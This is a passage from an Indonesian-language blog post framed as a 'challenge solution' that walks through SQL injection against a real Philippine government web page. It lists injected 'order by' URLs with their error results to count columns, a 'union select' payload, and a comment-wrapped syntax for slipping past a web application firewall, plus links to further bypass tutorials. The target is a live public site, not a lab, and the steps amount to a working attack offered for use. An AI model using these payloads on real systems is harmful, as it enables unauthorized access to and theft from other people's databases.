[ Chalenge Solution ] Sqli Ryuzaki Tetsuya Part 2

4. Step selanjutnya lakukan " order by " sampai muncul pesan error


http://pia.gov.ph/gis/region.php?id=16 order by 1--             [ no error ]
http://pia.gov.ph/gis/region.php?id=16 order by 2--             [ no error ]
http://pia.gov.ph/gis/region.php?id=16 order by 3--             [ no error ]
http://pia.gov.ph/gis/region.php?id=16 order by 4--             [ no error ]
http://pia.gov.ph/gis/region.php?id=16 order by 5--             [ no error ]
http://pia.gov.ph/gis/region.php?id=16 order by 6--             [ no error ]
http://pia.gov.ph/gis/region.php?id=16 order by 7--             [ error ]

oke dari percobaan diatas dapat disimpulkan jumlah kolomnya ada 6 berarti tinggal di union select aja .

5. Setelah itu coba lakukan " union select " untuk memunculkan angka ajaibnya :

http://pia.gov.ph/gis/region.php?id=-16 union select 1,2,3,4,5,6--

dan muncul

 loh kok blank ???? tenang aja dari sini dapat ditarik kesimpulan kalau perintah " union select " diblok oleh waf. dan untuk melewatinya silahkan lakukan bypass. untuk cara bypassnya tergantung biasanya cukup menambahkan 
/*!union*/ /*!select*/ tapi ada beberapa situs yang emang level wafnya sulit jadi ada custom bypassnya. untuk info beberapa contoh waf bypass silahkan cek di


http://raijee1337.blogspot.co.id/2015/05/union-based-sql-injection-waf-bypass.html

http://tutorial-sqli.blogspot.co.id/2015/07/mcam-macam-bypass-waf.html

Tweet

Postingan terkait:

Ditulis oleh tyrex — Jumat, 11 November 2016 — Add Comment — Challenge